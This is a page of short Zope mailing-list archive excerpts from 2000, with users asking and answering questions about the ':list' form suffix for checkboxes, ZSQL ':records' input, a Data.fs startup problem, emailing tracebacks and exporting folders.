~/.m2 directory Rob says: December 11, 2009 at 2:38 pm Thank you David Resnick! xyz says: January 7, 2011 at 11:05 am Refreshing the project didn’t help, but deleting the project from the workspace and re-importing the project did. Why do cars die after removing jumper cables? Why wouldn't the default JRE be usable? –Pacerier Nov 16 '14 at 12:57 | show 2 more comments up vote 30 down vote If the project is Maven, you can try That causes this bug.
http://geekster.org/cannot-be/eclipse-import-cannot-be-resolved-error.html
CC-MAIN-2017-47
refinedweb
1,342
72.05
The Array data structure is often better than individually declared variables. This tutorial will cover when to use arrays and how to initialize an array in C#. Why use an Array? Often, you will need to work with several related variables of the same data type. An array allows you to declare multiple variables and treat them as part of a single group. This makes data processing and variable manipulation much easier to code and more efficient to execute. Suppose you have several related Integer variables and you want to know which variable holds a certain value. If you were to use individually declared variables, you might set up a series of if… else if… statements in order to identify which variable contains the value you are interested in. This is a very poor approach from a programming perspective – it is painfully laborious to code, and takes more clock cycles to execute. With arrays, there is a better way! If you were to declare each of these integers as part of an array structure, you would be able to loop through the array and check for the value you are interested in. You might use a For Loop in this scenario to find out which variable contains the specific value. How to Declare an Array in C# To declare an array in C#, you will use the syntax: dataType[] arrayName = new dataType[arrayLength]; Create a New .NET Core Console Project in Visual Studio. Add the following line of code inside the static void Main() code block: int[] numbers = new int[5]; With this line, we have declared an array of Integer values. Our array has a length of 5; this means the array contains 5 integers, so it can hold 5 integer values. We can assign values to each integer in our array. int[] numbers = new int[5]; numbers[0] = 2; numbers[1] = 4; numbers[2] = 8; numbers[3] = 16; numbers[4] = 32; We reference individual items in our array structure by the item’s index. Index counting starts with the number 0, so our five items will have indices numbered 0-4. numbers[0] is the first item in the array, numbers[1] is the second item, and so forth. A Better Way to Initialize Array Values There is a simpler way to initialize an array in C#. int[] numbers = new int[] { 2, 4, 8, 16, 32 }; Using this syntax, we have both declared our array and set initial values for the elements in the array with a single line of code. This yields the same result as Lines 9-15 in our previous example. In both cases, our program will allocate memory in order to store an array of five integers, and it will assign the same values to each of those integers. Notice, we did not enter a length for this array. By including initial values inside the curly braces, the compiler will figure out the array’s size based on the number of elements that are initialized. We can use the same syntax to create an array of other datatypes, like strings: string[] names = new string[] { "Brad", "Brian", "Bob", "Bill" }; Accessing Values of Array Elements If you want to read the value of a specific element in your array, you would reference the item with the correct index number. using System; namespace Arrays { class Program { static void Main(string[] args) { int[] numbers = new int[] { 2, 4, 8, 16, 32 }; Console.WriteLine(numbers[2]); Console.ReadLine(); } } For example, if you want to print the value of the third variable in our array of integers, you might use the snippet above and you would expect the value 8 to be printed to the console. The Bottom Line Arrays are very useful data structure in the C# programming language. They allow you to quickly declare and efficiently process related variables of the same data type. In this tutorial, you were introduced to arrays and you learned the benefits of using arrays. We presented the basic syntax for declaring arrays, and showed a simple method for initializing arrays in C#. You also learned how to access the values of elements in your array according to their index number. Finally, we shared a complete example where an array was declared, initial values were set, and the value of a specific element was written to the console. Ask your questions about initializing C# arrays in the comments below.
https://wellsb.com/csharp/beginners/csharp-initialize-array/
CC-MAIN-2020-16
refinedweb
736
59.74
PROBLEM LINK: Author: Halry Bhalodia DIFFICULTY: CAKEWALK PREREQUISITES: None PROBLEM: Lucky numbers are numbers that only consists of lucky digits, i.e. 4 or 7. For example: 4, 7, 447, 47474 are lucky and 437, 147 are not. Halry likes Lucky number whereas Harry doesn’t. Harry likes nearly lucky numbers. Suppose you have an integer M. If the number of lucky digits in M is a lucky number and sum of the digits of the number M is also lucky then, the number is said to be nearly lucky. Halry decides to give some numbers and asks harry to find how many numbers are lucky, nearly lucky or none. Note: If a number is both lucky and nearly lucky, consider it as only lucky. EXPLANATION: This was a simple implementation problem in which you need to do as the question says. To check lucky number, you need to check all digits and if any of them is neither 4 nor 7, then the number can not be lucky. To check nearly lucky number, count of digit 4 + count of digit 7 in the number should be lucky and the sum of all digits should also be lucky. SOLUTION: Setter's Solution def isLucky(n): if n.count('4') + n.count('7') == len(n): return True return False def isNearlyLucky(n): lucky_digits = n.count('4') + n.count('7') sum_of_digits = 0 for ch in n: sum_of_digits += int(ch) if isLucky(str(lucky_digits)) and isLucky(str(sum_of_digits)): return True return False def solve(n, a): lucky = 0 nearly_lucky = 0 no = 0 for item in a: item = str(item) if isLucky(item): lucky += 1 elif isNearlyLucky(item): nearly_lucky += 1 else: no += 1 print(lucky, nearly_lucky, no) n = int(input()) a = list(map(int, input().split())) solve(n, a)
https://discuss.codechef.com/t/cakp05-editorial/84943
CC-MAIN-2021-49
refinedweb
295
63.09
Find The Difference January 15, 2019 We consider first a solution that sorts both strings then indexes through them until it finds a difference: (define (diff1 xstr ystr) (let loop ((xs (sort char<? (string->list xstr))) (ys (sort char<? (string->list ystr)))) (cond ((null? xs) (car ys)) ((char=? (car xs) (car ys)) (loop (cdr xs) (cdr ys))) (else (car ys))))) > (diff1 "abcdef" "bfxdeac") #\x That takes time O(n log n), where n is the length of the strings. A better solution operates in time O(n): (define (diff2 xstr ystr) (let ((x (sum (map char->integer (string->list xstr)))) (y (sum (map char->integer (string->list ystr))))) (integer->char (- y x)))) > (diff2 "abcdef" "bfxdeac") #\x That indexes through the two strings, without sorting, summing the ascii values of the characters in the strings and reporting the difference at the end. You could use XOR instead of addition if you prefer. You can run the program at Scala: (t.toSet–(s.toSet)).iterator.next //> res0: Char = x Nice one for perl… in the case we are only looking for one known difference it is just finding the letter in the two strings which appears an odd number of times…. If you were looking for all added/removed letters you could change this to: The %f contains +ve values for letters in $x but not $y and then -ve values for letters in $y but not in $x if that makes sense (and the absolute value is the count of each). Cool one for basic text processing. Here is my take with Julia 1.0.2: function StringDifference(s::AbstractString, t::AbstractString) S = sort(split(s, “”)) T = sort(split(t, “”)) end #include #include #include using namespace std; int main() { string s1; string s2; string s3; Fun exercise! I wouldn’t have thought of the xor on my own. I also didn’t trust myself to always put the shorter string first, so my solutions allow for supplying the strings in either order. module Main where import Data.Bits (xor) import Data.Char (chr, ord) import Data.Foldable (foldl') import qualified Data.Set as S data Solution a b = S { _in :: String -> a } , _compute :: a -> a -> b , _out :: b -> Char run :: Solution a b -> String -> String -> Char run (S i c o) x y = o $ c (i x) (i y) s1 :: Solution (S.Set Char) (S.Set Char) s1 = S S.fromList (\x y -> (x S.uniony) S.\\ (x S.intersectiony)) S.findMin s2 :: Solution Int Int s2 = S (sum . fmap ord) (-) (chr . abs) s3 :: Solution Int Int s3 = S (foldl' xor 0 . fmap ord) xor chr main :: IO () main = do let x = "abcdef" y = "bfxdeac" print $ all (== 'x') [run s1 x y, run s2 x y, run s3 x y] Sorry, I tried to HTML-escape & post in code tags, but that didn’t work right. Retrying with the WordPress sourcecode attribute: Clearly, it’s been too long since I visited! More syntax woes, apologies. My answer in Python s = ‘abcdef’ t = ‘cbdefxa’ for c in t: if c not in s: print(c) My C++ is in danger of getting rusty, so let’s use it for a solution. See for how the main function compiles. That needs C++14 features, so build with eg: Python solution using sets (similar to Haskell s1 solution above). Three Python solutions. Python solution. Works when s or t have duplicate letters (set solutions don’t). Stops when the new letter is found, so it may not process the entire string. @Mike: doesn’t that assume that the characters haven’t been shuffled? Good point on use of sets though. Here’s a more streamlined version of my C++ solution: Another Haskell version. @Graham, I use the following shell script to create comments here. EOF test -z "$cmd" || { echo " [/code] I run it like then just paste the output in the comment widget. LOL! I feel your pain. :-) Here are a few approaches in C. The table-driven approach was my initial implementation. It counts each letter and then compares the counts. The other approaches were inspired by the solution: an XOR approach, a sum approach, and a sorting approach. Example: I forgot to free my memory allocations :-(. Here’s an update. The fastest solution I could find in Python. Prolog solution here (not optimized): Then just
https://programmingpraxis.com/2019/01/15/find-the-difference/2/
CC-MAIN-2022-21
refinedweb
723
82.85
A Dummy’s Guide to Redux and Thunk in React If, like me, you’ve read the Redux docs, watched Dan’s videos, done Wes’ course and still not quite grasped how to use Redux, hopefully this will help. It took me a few attempts at using Redux before it clicked, so I thought I’d write down the process of converting an existing application that fetches JSON to use Redux and Redux Thunk. If you don’t know what Thunk is, don’t worry too much, but we’ll use it to make asynchronous calls in the “Redux way”. This tutorial assumes you have a basic grasp of React and ES6/2015, but it should hopefully be easy enough to follow along regardless. The non-Redux way Let’s start with creating a React component in components/ItemList.js to fetch and display a list of items. Laying the foundations First we’ll setup a static component with a state that contains various items to output, and 2 boolean states to render something different when it's loading or errored respectively. import React, { Component } from 'react'; class ItemList extends Component { constructor() { super(); this.state = { items: [ { id: 1, label: 'List item 1' }, { id: 2, label: 'List item 2' }, { id: 3, label: 'List item 3' }, { id: 4, label: 'List item 4' } ], hasErrored: false, isLoading: false }; } render() { if (this.state.hasErrored) { return <p>Sorry! There was an error loading the items</p>; } if (this.state.isLoading) { return <p>Loading…</p>; } return ( <ul> {this.state.items.map((item) => ( <li key={item.id}> {item.label} </li> ))} </ul> ); } } export default ItemList; It may not seem like much, but this is a good start. When rendered, the component should output 4 list items, but if you were to set isLoading or hasErrored to true, a relevant <p></p> would be output instead. Making it dynamic Hard-coding the items doesn’t make for a very useful component, so let’s fetch the items from a JSON API, which will also allow us to set isLoading and hasErrored as appropriate. The response will be identical to our hard-coded list of items, but in the real world, you could pull in a list of best-selling books, latest blog posts, or whatever suits your application. To fetch the items, we’re going to use the aptly named Fetch API. Fetch makes making requests much easier than the classic XMLHttpRequest and returns a promise of the resolved response (which is important to Thunk). Fetch isn’t available in all browsers, so you’ll need to add it as a dependency to your project with: npm install whatwg-fetch --save The conversion is actually quite simple. - First we’ll set our initial itemsto an empty array [] - Now we’ll add a method to fetch the data and set the loading and error states: fetchData(url) { this.setState({ isLoading: true }); fetch(url) .then((response) => { if (!response.ok) { throw Error(response.statusText); } this.setState({ isLoading: false }); return response; }) .then((response) => response.json()) .then((items) => this.setState({ items })) // ES6 property value shorthand for { items: items } .catch(() => this.setState({ hasErrored: true })); } - Then we’ll call it when the component mounts: componentDidMount() { this.fetchData(''); } Which leaves us with (unchanged lines omitted): class ItemList extends Component { constructor() { this.state = { items: [], }; } fetchData(url) { this.setState({ isLoading: true }); fetch(url) .then((response) => { if (!response.ok) { throw Error(response.statusText); } this.setState({ isLoading: false }); return response; }) .then((response) => response.json()) .then((items) => this.setState({ items })) .catch(() => this.setState({ hasErrored: true })); } componentDidMount() { this.fetchData(''); } render() { } } And that’s it. Your component now fetches the items from a REST endpoint! You should hopefully see "Loading…"appear briefly before the 4 list items. If you pass in a broken URL to fetchData you should see our error message. However, in reality, a component shouldn’t include logic to fetch data, and data shouldn’t be stored in a component’s state, so this is where Redux comes in. Converting to Redux To start, we need to add Redux, React Redux and Redux Thunk as dependencies of our project so we can use them. We can do that with: npm install redux react-redux redux-thunk --save Understanding Redux There are a few core principles to Redux which we need to understand: - There is 1 global state object that manages the state for your entire application. In this example, it will behave identically to our initial component’s state. It is the single source of truth. - The only way to modify the state is through emitting an action, which is an object that describes what should change. Action Creators are the functions that are dispatched to emit a change – all they do is returnan action. - When an action is dispatched, a Reducer is the function that actually changes the state appropriate to that action – or returns the existing state if the action is not applicable to that reducer. - Reducers are “pure functions”. They should not have any side-effects nor mutate the state — they must return a modified copy. - Individual reducers are combined into a single rootReducerto create the discrete properties of the state. - The Store is the thing that brings it all together: it represents the state by using the rootReducer, any middleware (Thunk in our case), and allows you to actually dispatchactions. - For using Redux in React, the <Provider />component wraps the entire application and passes the storedown to all children. This should all become clearer as we start to convert our application to use Redux. Designing our state From the work we’ve already done, we know that our state needs to have 3 properties: items, hasErrored and isLoading for this application to work as expected under all circumstances, which correlates to needing 3 unique actions. Now, here is why Action Creators are different to Actions and do not necessarily have a 1:1 relationship: we need a fourth action creator that calls our 3 other action (creators) depending on the status of fetching the data. This fourth action creator is almost identical to our original fetchData() method, but instead of directly setting the state with this.setState({ isLoading: true }), we'll dispatch an action to do the same: dispatch(isLoading(true)). Creating our actions Let’s create an actions/items.js file to contain our action creators. We'll start with our 3 simple actions. export function itemsHasErrored(bool) { return { type: 'ITEMS_HAS_ERRORED', hasErrored: bool }; } export function itemsIsLoading(bool) { return { type: 'ITEMS_IS_LOADING', isLoading: bool }; } export function itemsFetchDataSuccess(items) { return { type: 'ITEMS_FETCH_DATA_SUCCESS', items }; } As mentioned before, action creators are functions that return an action. We export each one so we can use them elsewhere in our codebase. The first 2 action creators take a bool ( true/ false) as their argument and return an object with a meaningful type and the bool assigned to the appropriate property. The third, itemsFetchDataSuccess(), will be called when the data has been successfully fetched, with the data passed to it as items. Through the magic of ES6 property value shorthands, we'll return an object with a property called items whose value will be the array of items; Note: that the value you use for type and the name of the other property that is returned is important, because you will re-use them in your reducers Now that we have the 3 actions which will represent our state, we’ll convert our original component’s fetchDatamethod to an itemsFetchData() action creator. By default, Redux action creators don’t support asynchronous actions like fetching data, so here’s where we utilise Redux Thunk. Thunk allows you to write action creators that return a function instead of an action. The inner function can receive the store methods dispatch and getState as parameters, but we'll just use dispatch. A real simple example would be to manually trigger itemsHasErrored() after 5 seconds. export function errorAfterFiveSeconds() { // We return a function instead of an action object return (dispatch) => { setTimeout(() => { // This function is able to dispatch other action creators dispatch(itemsHasErrored(true)); }, 5000); }; } Now we know what a thunk is, we can write itemsFetchData(). export function itemsFetchData(url) { return (dispatch) => { dispatch(itemsIsLoading(true)); fetch(url) .then((response) => { if (!response.ok) { throw Error(response.statusText); } dispatch(itemsIsLoading(false)); return response; }) .then((response) => response.json()) .then((items) => dispatch(itemsFetchDataSuccess(items))) .catch(() => dispatch(itemsHasErrored(true))); }; } Creating our reducers With our action creators defined, we now write reducers that take these actions and return a new state of our application. Note: In Redux, all reducers get called regardless of the action, so inside each one you have to return the original state if the action is not applicable. Each reducer takes 2 parameters: the previous state ( state) and an action object. We can also use an ES6 feature called default parameters to set the default initial state. Inside each reducer, we use a switch statement to determine when an action.type matches. While it may seem unnecessary in these simple reducers, your reducers could theoretically have a lot of conditions, so if/ else if/ else will get messy fast. If the action.type matches, then we return the relevant property of action. As mentioned earlier, the type and action[propertyName] is what was defined in your action creators. OK, knowing this, let’s create our items reducers in reducers/items.js. export function itemsHasErrored(state = false, action) { switch (action.type) { case 'ITEMS_HAS_ERRORED': return action.hasErrored; default: return state; } } export function itemsIsLoading(state = false, action) { switch (action.type) { case 'ITEMS_IS_LOADING': return action.isLoading; default: return state; } } export function items(state = [], action) { switch (action.type) { case 'ITEMS_FETCH_DATA_SUCCESS': return action.items; default: return state; } } Notice how each reducer is named after the resulting store’s state property, with the action.type not necessarily needing to correspond. The first 2 reducers hopefully make complete sense, but the last, items(), is slightly different. This is because it could have multiple conditions which would always return an array of items: it could return all in the case of a fetch success, it could return a subset of items after a delete action is dispatched, or it could return an empty array if everything is deleted. To re-iterate, every reducer will return a discrete property of the state, regardless of how many conditions are inside that reducer. That initially took me a while to get my head around. With the individual reducers created, we need to combine them into a rootReducer to create a single object. Create a new file at reducers/index.js. import { combineReducers } from 'redux'; import { items, itemsHasErrored, itemsIsLoading } from './items'; export default combineReducers({ items, itemsHasErrored, itemsIsLoading }); We import each of the reducers from items.js and export them with Redux's combineReducers(). As our reducer names are identical to what we want to use for a store's property names, we can use the ES6 shorthand. Notice how I intentionally prefixed my reducer names, so that when the application grows in complexity, I’m not constrained by having a “global” hasErrored or isLoading property. You may have many different features that could error or be in a loading state, so prefixing the imports and then exporting those will give your application's state greater granularity and flexibility. For example: import { combineReducers } from 'redux'; import { items, itemsHasErrored, itemsIsLoading } from './items'; import { posts, postsHasErrored, postsIsLoading } from './posts'; export default combineReducers({ items, itemsHasErrored, itemsIsLoading, postsHasErrored, postsIsLoading }); Alternatively, you could alias the methods on import, but I prefer consistency across the board. Configure the store and provide it to your app This is pretty straightforward. Let’s create store/configureStore.js with: import { createStore, applyMiddleware } from 'redux'; import thunk from 'redux-thunk'; import rootReducer from '../reducers'; export default function configureStore(initialState) { return createStore( rootReducer, initialState, applyMiddleware(thunk) ); } Now change our app’s index.js to include <Provider />, configureStore, set up our store and wrap our app ( <ItemList />) to pass the store down as props: import React from 'react'; import { render } from 'react-dom'; import { Provider } from 'react-redux'; import configureStore from './store/configureStore'; import ItemList from './components/ItemList'; const store = configureStore(); // You can also pass in an initialState here render( <Provider store={store}> <ItemList /> </Provider>, document.getElementById('app') ); I know, it’s taken quite a bit of effort to get to this stage, but with the set up complete, we can now modify our component to make use of what we’ve done. Converting our component to use the Redux store and methods Let’s jump back in to components/ItemList.js. At the top of the file, import what we need: import { connect } from 'react-redux'; import { itemsFetchData } from '../actions/items'; connect is what allows us to connect a component to Redux's store, and itemsFetchData is the action creator we wrote earlier. We only need to import this one action creator, as it handles dispatching the other actions. After our component’s class definition, we're going to map Redux's state and the dispatching of our action creator to props. We create a function that accepts state and then returns an object of props. In a simple component like this, I remove the prefixing for the has/ is props as it’s obvious that they're related to items. const mapStateToProps = (state) => { return { items: state.items, hasErrored: state.itemsHasErrored, isLoading: state.itemsIsLoading }; }; And then we need another function to be able to dispatch our itemsFetchData() action creator with a prop. const mapDispatchToProps = (dispatch) => { return { fetchData: (url) => dispatch(itemsFetchData(url)) }; }; Again, I’ve removed the items prefix from the returned object property. Here fetchData is a function that accepts a url parameter and returns dispatching itemsFetchData(url). Now, these 2 mapStateToProps() and mapDispatchToProps() don't do anything yet, so we need to change our final export line to: export default connect(mapStateToProps, mapDispatchToProps)(ItemList); This connects our ItemList to Redux while mapping the props for us to use. The final step is to convert our component to use props instead of state, and to remove the leftovers. - Delete the constructor() {}and fetchData() {}methods as they're unnecessary now. - Change this.fetchData()in componentDidMount()to this.props.fetchData(). - Change this.state.Xto this.props.Xfor .hasErrored, .isLoadingand .items. Your component should now look like this: import React, { Component } from 'react'; import { connect } from 'react-redux'; import { itemsFetchData } from '../actions/items'; class ItemList extends Component { componentDidMount() { this.props.fetchData(''); } render() { if (this.props.hasErrored) { return <p>Sorry! There was an error loading the items</p>; } if (this.props.isLoading) { return <p>Loading…</p>; } return ( <ul> {this.props.items.map((item) => ( <li key={item.id}> {item.label} </li> ))} </ul> ); } } const mapStateToProps = (state) => { return { items: state.items, hasErrored: state.itemsHasErrored, isLoading: state.itemsIsLoading }; }; const mapDispatchToProps = (dispatch) => { return { fetchData: (url) => dispatch(itemsFetchData(url)) }; }; export default connect(mapStateToProps, mapDispatchToProps)(ItemList); And that’s it! The application now uses Redux and Redux Thunk to fetch and display the data! That wasn’t too difficult, was it? And you’re now a Redux master :D What next? I’ve put all of this code up on GitHub, with commits for each step. I want you to clone it, run it and understand it, then add the ability for the user to delete individual list items based on the item’s index. I haven’t yet really mentioned that in Redux, the state is immutable, which means you can’t modify it, so have to return a new state in your reducers instead. The 3 reducers we wrote above were simple and “just worked”, but deleting items from an array requires an approach that you may not be familiar with. You can no longer use Array.prototype.splice() to remove items from an array, as that will mutate the original array. Dan explains how to remove an element from an array in this video, but if you get stuck, you can check out (pun intended) the delete-items branch for the solution. I really hope that this has clarified the concept of Redux and Thunk and how you might go about converting an existing React application to use them. I know that writing this has solidified my understanding of it, so I’m very happy to have done it. I’d still recommend reading the Redux docs, watching Dan’s videos, and re-doing Wes’ course as you should hopefully now be able to understand some of the other more complex and deeper principles. This article has been cross-posted on Codepen for better code formatting.
https://medium.com/@stowball/a-dummys-guide-to-redux-and-thunk-in-react-d8904a7005d3
CC-MAIN-2019-26
refinedweb
2,729
54.93
{-# LANGUAGE CPP, MultiParamTypeClasses #-} {- | Module : Data.ArrayBZ.Internals.IArray Copyright : (c) The University of Glasgow 2001 & (c) 2006 Bulat Ziganshin License : BSD3 Maintainer : Bulat Ziganshin <Bulat.Ziganshin@gmail.com> Stability : experimental Portability: GHC/Hugs Immutable arrays: class, general algorithms and Show/Ord/Eq implementations -} module Data.ArrayBZ.Internals.IArray where import Data.Ix #ifdef __GLASGOW_HASKELL__ import GHC.Arr ( unsafeIndex ) #endif #ifdef __HUGS__ import Hugs.Array ( unsafeIndex ) #endif ----------------------------------------------------------------------------- -- Class of immutable arrays -- | Class of array types with immutable bounds -- (even if the array elements are mutable). class HasBounds a where -- | Extracts the bounds of an array bounds :: Ix i => a i e -> (i,i) {- |. -} class HasBounds a => IArray a e where unsafeArray :: Ix i => (i,i) -> [(Int, e)] -> a i e unsafeAt :: Ix i => a i e -> Int -> e unsafeReplace :: Ix i => a i e -> [(Int, e)] -> a i e unsafeAccum :: Ix i => (e -> e' -> e) -> a i e -> [(Int, e')] -> a i e unsafeAccumArray :: Ix i => (e -> e' -> e) -> e -> (i,i) -> [(Int, e')] -> a i e ----------------------------------------------------------------------------- -- Algorithms on immutable arrays {-# INLINE array #-} {-|: 'Data.Array.Array' is a non-strict array type, but all of the 'Data.Array.Unbox. -} array :: (IArray a e, Ix i) => (i,i) -- ^ bounds of the array: (lowest,highest) -> [(i, e)] -- ^ list of associations -> a i e array (l,u) ies = unsafeArray (l,u) [(index (l,u) i, e) | (i, e) <- ies] -- Since unsafeFreeze is not guaranteed to be only a cast, we will -- use unsafeArray and zip instead of a specialized loop to implement -- listArray, unlike Array.listArray, even though it generates some -- unnecessary heap allocation. Will use the loop only when we have -- fast unsafeFreeze, namely for Array and UArray (well, they cover -- almost all cases). {-# INLINE listArray #-} -- | Constructs an immutable array from a list of initial elements. -- The list gives the elements of the array in ascending order -- beginning with the lowest index. listArray :: (IArray a e, Ix i) => (i,i) -> [e] -> a i e listArray (l,u) es = unsafeArray (l,u) (zip [0 .. rangeSize (l,u) - 1] es) {-# INLINE (!) #-} -- | Returns the element of an immutable array at the specified index. (!) :: (IArray a e, Ix i) => a i e -> i -> e arr ! i = case bounds arr of (l,u) -> unsafeAt arr (index (l,u) i) {-# INLINE indices #-} -- | Returns a list of all the valid indices in an array. indices :: (HasBounds a, Ix i) => a i e -> [i] indices arr = case bounds arr of (l,u) -> range (l,u) {-# INLINE elems #-} -- | Returns a list of all the elements of an array, in the same order -- as their indices. elems :: (IArray a e, Ix i) => a i e -> [e] elems arr = case bounds arr of (l,u) -> [unsafeAt arr i | i <- [0 .. rangeSize (l,u) - 1]] {-# INLINE assocs #-} -- | Returns the contents of an array as a list of associations. assocs :: (IArray a e, Ix i) => a i e -> [(i, e)] assocs arr = case bounds arr of (l,u) -> [(i, unsafeAt arr (unsafeIndex (l,u) i)) | i <- range (l,u)] {-# INLINE accumArray #-} {-|] -} accumArray :: (IArray a e, Ix i) => (e -> e' -> e) -- ^ An accumulating function -> e -- ^ A default element -> (i,i) -- ^ The bounds of the array -> [(i, e')] -- ^ List of associations -> a i e -- ^ Returns: the array accumArray f initial (l,u) ies = unsafeAccumArray f initial (l,u) [(index (l,u) i, e) | (i, e) <- ies] {-# INLINE (//) #-} {-| 'Data.Array.Diff.DiffArray' type provides this operation with complexity linear in the number of updates. -} (//) :: (IArray a e, Ix i) => a i e -> [(i, e)] -> a i e arr // ies = case bounds arr of (l,u) -> unsafeReplace arr [(index (l,u) i, e) | (i, e) <- ies] {-# INLINE accum #-} {-| @accum f@ takes an array and an association list and accumulates pairs from the list into the array with the accumulating function @f@. Thus 'accumArray' can be defined using 'accum': > accumArray f z b = accum f (array b [(i, z) | i \<- range b]) -} accum :: (IArray a e, Ix i) => (e -> e' -> e) -> a i e -> [(i, e')] -> a i e accum f arr ies = case bounds arr of (l,u) -> unsafeAccum f arr [(index (l,u) i, e) | (i, e) <- ies] {-# INLINE amap #-} -- | Returns a new array derived from the original array by applying a -- function to each of the elements. amap :: (IArray a e', IArray a e, Ix i) => (e' -> e) -> a i e' -> a i e amap f arr = case bounds arr of (l,u) -> unsafeArray (l,u) [(i, f (unsafeAt arr i)) | i <- [0 .. rangeSize (l,u) - 1]] {-# INLINE ixmap #-} -- | Returns a new array derived from the original array by applying a -- function to each of the indices. ixmap :: (IArray a e, Ix i, Ix j) => (i,i) -> (i -> j) -> a j e -> a i e ixmap (l,u) f arr = unsafeArray (l,u) [(unsafeIndex (l,u) i, arr ! f i) | i <- range (l,u)] ----------------------------------------------------------------------------- -- Implementation of Show instance {-# SPECIALISE showsIArray :: (IArray a e, Ix i, Show i, Show e) => Int -> a i e -> ShowS #-} showsIArray :: (IArray a e, Ix i, Show i, Show e) => Int -> a i e -> ShowS showsIArray p a = showParen (p > 9) $ showString "array " . shows (bounds a) . showChar ' ' . shows (assocs a) ----------------------------------------------------------------------------- -- Implementation of Eq/Ord instances {-# INLINE eqIArray #-} eqIArray :: (IArray a e, Ix i, Eq e) => a i e -> a i e -> Bool eqIArray arr1 arr2 = case bounds arr1 of { (l1,u1) -> case bounds arr2 of { ]]}} {-# INLINE cmpIArray #-} cmpIArray :: (IArray a e, Ix i, Ord e) => a i e -> a i e -> Ordering cmpIArray arr1 arr2 = compare (assocs arr1) (assocs arr2) {-# INLINE cmpIntIArray #-} cmpIntIArray :: (IArray a e, Ord e) => a Int e -> a Int e -> Ordering cmpIntIArray arr1 arr2 = case bounds arr1 of { (l1,u1) -> case bounds arr2 of { (l2,u2) -> if rangeSize (l1,u1) == 0 then if rangeSize (l2,u2) == 0 then EQ else LT else if rangeSize (l2,u2) == 0 then GT else case compare l1 l2 of EQ -> foldr cmp (compare u1 u2) [0 .. rangeSize (l1, min u1 u2) - 1] other -> other } } where cmp i rest = case compare (unsafeAt arr1 i) (unsafeAt arr2 i) of EQ -> rest other -> other {-# RULES "cmpIArray/Int" cmpIArray = cmpIntIArray #-}
http://hackage.haskell.org/package/ArrayRef-0.1.3/docs/src/Data-ArrayBZ-Internals-IArray.html
CC-MAIN-2016-50
refinedweb
1,002
52.12
Hello, So this one is a real quick python script that is surely gonna save a lot of time. We will be able to declutter any folder and move particular files (based on the file extension) to any destination folder that you want. This is just a basic script, and a lot of features can be added to it. Okay Let’s start this tutorial: - So first of all, we need to import some modules to go further. import os import shutil from pathlib import Path OS module is a very useful module that provides Operating System-related functions to either creating or removing a directory/file, checking the current directory, and changing it, etc. Shutil is also a powerful module that lets you perform high-level functions. It can automate functions like copying, creating, and removal of files and folders. The pathlib module lets you work with filesystem paths. It works on classes which is an OOPS concept(Object Oriented Programming). - In this tutorial, I have used my “Downloads” Folder to declutter, you can use any folder and give the path to it. downloads_path = str(Path.home() / "Downloads") # print(os.path.isdir(downloads_path)) # You can print the path, just to make sure that the path you have given is working and you are good to go ahead. Note: You can even get to the home directory with the ‘os module’ itself. For that, the code will look like this: from os.path import expanduser home = expanduser("~") - Just give the sourcepath and sourcefiles parameters. This will fix your source folder and will further list all the files present there. sourcepath = downloads_path sourcefiles = os.listdir(sourcepath) - Now we have to make a destination folder to which our files from the source folder will get moved. # give the path where you want your destination folder to be path = "F:\\TECHBIT\\songs" # mkdir for making a diirectory os.mkdir(path) # setting the destination path as the path, where we just made a new folder destinationpath= path - Lastly, we have to loop it up for all the files in the source folder. You can pass multiple arguments here to customize the code according to your need. I need to move my “.mp3” files from the “Downloads” folder to a folder named “songs” in my F drive. So accordingly, I chose the file type as “.mp3”. - The shutil module first works with joining the source path and the file and then moving the file with the “.mp3” file type to the destination path. # give the path where you want your destination folder to be for file in sourcefiles: if file.endswith('.mp3'): shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file)) **You can run the same code for any file extension, just replace the “.mp3” with your desired file extension. Here’s the complete code with the pathlib module: import os import shutil from pathlib import Path downloads_path = str(Path.home() / "Downloads") sourcepath = downloads_path sourcefiles = os.listdir(sourcepath) path = "F:\\TECHBIT\\songs" os.mkdir(path) destinationpath= path for file in sourcefiles: if file.endswith('.mp3'): shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file)) Alternatively, you can just use the OS module and Shutil. It will work just the same. Here’s the complete code for that: import os import shutil from os.path import expanduser home = expanduser("~") sourcepath = home sourcefiles = os.listdir(sourcepath) path = "F:\\TECHBIT\\songs2" os.mkdir(path) destinationpath= path for file in sourcefiles: if file.endswith('.mp3'): shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file)) That’s all for now. I hope it will help you somewhere and it was worth your time. Do share your feedback and also your approach to the same problem. 2 Comments Aathira · July 9, 2021 at 8:06 am Nice explanation Vaishali_Rastogi · July 9, 2021 at 8:30 am Thanks, Aathira.
https://techbit.in/programming/python-script-to-easily-organize-files-folders-and-save-time/
CC-MAIN-2022-21
refinedweb
646
67.15
[Zope] Single html checkbox as list? Hi, Re: [Zope] Single html checkbox as list? +---[ [EMAIL PROTECTED] ]-- | Hi, ... | Is there a way to force the variable to be a list, even if only one | checkbox is selected? | name="foo:list" will force it to be a list. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew Milton The Re: [Zope] Single html checkbox as list? just do something like: input type="checkbox" name="yourname:list" good luck Jerome ALET - [EMAIL PROTECTED] - Faculte de Medecine de Nice - - Tel: 04 93 37 76 30 28 Avenue de Valombrose - 06107 NICE Cedex 2 - FRANCE On Mon, 25 Sep 2000 Re: [Zope] Use of the :records variable type and ZSQL methods Error Type: Bad Request Error Value: ['Field1', 'Field2'] Here is the code I used and sqlTest is the ZSQL Method that just inserts the two fields into a test DB: dtml-in testlist dtml-call sqlTest /dtml-in What am I doing wrong? you'll have to feed a named argument to your Zsql [Zope] Data.fs problem!!! Hi, I've some problems with my Zope database! I don't know what I've done wrong, but the only thing I did was installing the beta of MP. After the installation everything was still normal. Then I wanted to shutdown Zope and restard it in debug mode. Restarting in debug gave an error, but zope Re: [Zope] What options exist for dealing with tracebacks? I would love it if I could set some debug environment variable, run with -D="[EMAIL PROTECTED]" or subclass some Error class and have tracebacks mailed to me. I wouldn't even care about the flood of email. At least I'd have all the inputs. Although Didier Georgieff has given a thorough [Zope] Can't export only an ObjectManager Andy McKay wrote: How do I export a folder using the Import/Export tab with exporting all the subobjects? You do mean 'wihout', don't you? (Stupidest suggestion so far: delete all subjects, export, undelete) That's the only way I can think of... A patch that added a checkbox and a little Re: [Zope] HTML Widgets, In-place editing in Zope Phill Hugo wrote: Cool :-) widgets is an external method which will be on Zope.org next week if all goes well. Looking forward to it... cheers, Chris 